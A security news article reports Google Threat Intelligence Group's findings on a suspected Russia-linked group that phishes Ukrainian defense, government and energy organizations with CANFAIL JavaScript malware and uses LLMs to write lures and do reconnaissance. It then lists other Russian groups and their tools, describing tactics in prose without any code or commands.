Suspected Russian hackers deploy CANFAIL malware against Ukraine

A new alleged Russia-linked APT group targeted Ukrainian defense, government, and energy groups, with CANFAIL malware.

Google Threat Intelligence Group identified a previously undocumented threat actor behind attacks on Ukrainian organizations using CANFAIL malware. The group is possibly linked to Russian intelligence services and has targeted defense, military, government, and energy entities at both regional and national levels in Ukraine.

GTIG researchers observed the Russian intelligence conducting phishing campaigns to deliver CANFAIL malware. The actor is also interested in aerospace, drone-linked manufacturers, nuclear research, and humanitarian groups tied to Ukraine. Google reported that the APT group has also probed Romanian and Moldovan entities.

“GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.” reads the report published by Google. “Despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs. Through prompting, they conduct reconnaissance, create lures for social engineering, and seek answers to basic technical questions for post-compromise activity and C2 infrastructure setup.  “

Though less advanced than other Russian groups, it uses LLMs to craft lures, perform reconnaissance, and solve technical tasks. The threat actors wrote the phishing emails with LLM.

Messages include Google Drive links hosting a RAR archive with CANFAIL malware, often disguised with a double extension like .pdf.js. CANFAIL is obfuscated JavaScript that runs a PowerShell script to download and execute a second-stage payload, typically a memory-only dropper, while showing a fake error popup to the victim.

“Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, uses formal language and a specific official template, and Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.” continues the report. “CANFAIL is obfuscated JavaScript which executes a PowerShell script to download and execute an additional stage, most commonly a memory-only PowerShell dropper. It additionally displays a fake “error” popup to the victim.”

SentinelLABS and the Digital Security Lab of Ukraine documented related activity in the October 2025 “PhantomCaptcha” campaign, which briefly used ClickFix tactics.

Russian espionage groups continue targeting Ukrainian and Western defense-related organizations using military- and drone-themed lures. Below are some groups observed by Google Threat Intelligence Group:

• APT44 (Sandworm/FROZENBARENTS), linked to GRU Unit 74455, has sought to extract data from Signal and Telegram, using tools like WAVESIGN and INFAMOUSCHISEL to steal information from Windows and Android devices.
• TEMP.Vermin, tied to LPR-linked actors, deployed malware such as VERMONSTER and SPECTRUM using aerospace and drone-themed domains.
• UNC5125 targeted frontline drone units with Google Forms lures and malware like MESSYFORK and GREYBATTLE.
• UNC5792 and UNC4221 abused Signal and WhatsApp features with fake group invites and phishing pages to hijack accounts and deploy malware including STALECOOKIE and TINYWHALE.
• UNC5976 ran phishing campaigns with malicious RDP files and drone-themed decoys spoofing global defense firms.
• UNC6096 used WhatsApp to deliver Windows and Android malware, including GALLGRAB.
• UNC5114 spread CraxsRAT disguised as a Kropyva app update.

“Russia’s use of cyber operations in support of military objectives in the war against Ukraine and beyond is multifaceted. On a tactical level, targeting has broadened to include individuals in addition to organizations in order to support frontline operations and beyond, likely due at least in part to the reliance on public and off-the-shelf technology rather than custom products.” concludes the report. “Russian threat actors have targeted secure messaging applications used by the Ukrainian military to communicate and orchestrate military operations, including via attempts to exfiltrate locally stored databases of these apps, such as from mobile devices captured during Russia’s ongoing invasion of Ukraine. “

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, CANFAIL malware)